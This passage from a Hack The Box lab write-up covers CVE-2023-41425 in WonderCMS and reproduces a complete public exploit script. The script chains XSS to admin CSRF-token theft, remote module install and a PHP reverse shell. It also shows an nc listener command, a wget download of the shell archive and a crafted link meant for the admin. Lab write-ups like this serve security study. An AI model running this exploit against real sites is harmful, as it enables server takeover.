CVE-2023-41425
A vulnerability was found in Wonder CMS up to 3.4.2 (Content Management System). It has been classified as problematic. Affected is some unknown processing of the component installModule. The manipulation with an unknown input leads to a cross site scripting vulnerability. CWE is classifying the issue as CWE-79. The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. This is going to have an impact on integrity.
Exploit
Exploit found online
# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE
import sys
import requests
import os
import bs4
if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
if (xhr3.status == 200) {
var xhr4 = new XMLHttpRequest();
xhr4.withCredentials = true;
xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
xhr4.send();
xhr4.onload = function() {
if (xhr4.status == 200) {
var ip = "'''+str(sys.argv[2])+'''";
var port = "'''+str(sys.argv[3])+'''";
var xhr5 = new XMLHttpRequest();
xhr5.withCredentials = true;
xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
xhr5.send();
}
};
}
};
'''
try:
open("xss.js","w").write(data)
print("[+] xss.js is created")
print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
print("----------------------------\n")
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
XSSlink = XSSlink.strip(" ")
print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
print("----------------------------\n")
print("\nstarting HTTP server to allow the access to xss.js")
os.system("python3 -m http.server\n")
except: print(data,"\n","//write this to a file")The exploit works by abusing the installModule element.
It generates a JS file for XSS, xss.js, and its content downloads an archive file containing a reverse shell script from a remote location; https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip
Modification
Since the target system does not have access to the public internet, it won’t be able to fetch the reverse shell script in the remote location. I would need to modify the exploit script
┌──(kali㉿kali)-[~/…/htb/labs/sea/CVE-2023-41425]
└─$ wget -q https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zipI will first download the archive from the remote location that contains a reverse shell
┌──(kali㉿kali)-[~/…/htb/labs/sea/CVE-2023-41425]
└─$ 7z l main.zip
7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 2680 bytes (3 KiB)
Listing archive: main.zip
--
Path = main.zip
Type = zip
Physical Size = 2680
Comment = 1f1a52393d8a6ff6c27e56d958c6d0ee45e7a37f
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-08-02 18:44:09 D.... 0 0 revshell-main
2023-08-02 18:44:09 ..... 5736 2360 revshell-main/rev.php
------------------- ----- ------------ ------------ ------------------------
2023-08-02 18:44:09 5736 2360 1 files, 1 foldersThe main.zip file contains a PHP reverse shell; revshell-main/rev.php
and I will host the main.zip
and modify the URL to that of Kali on the port 8081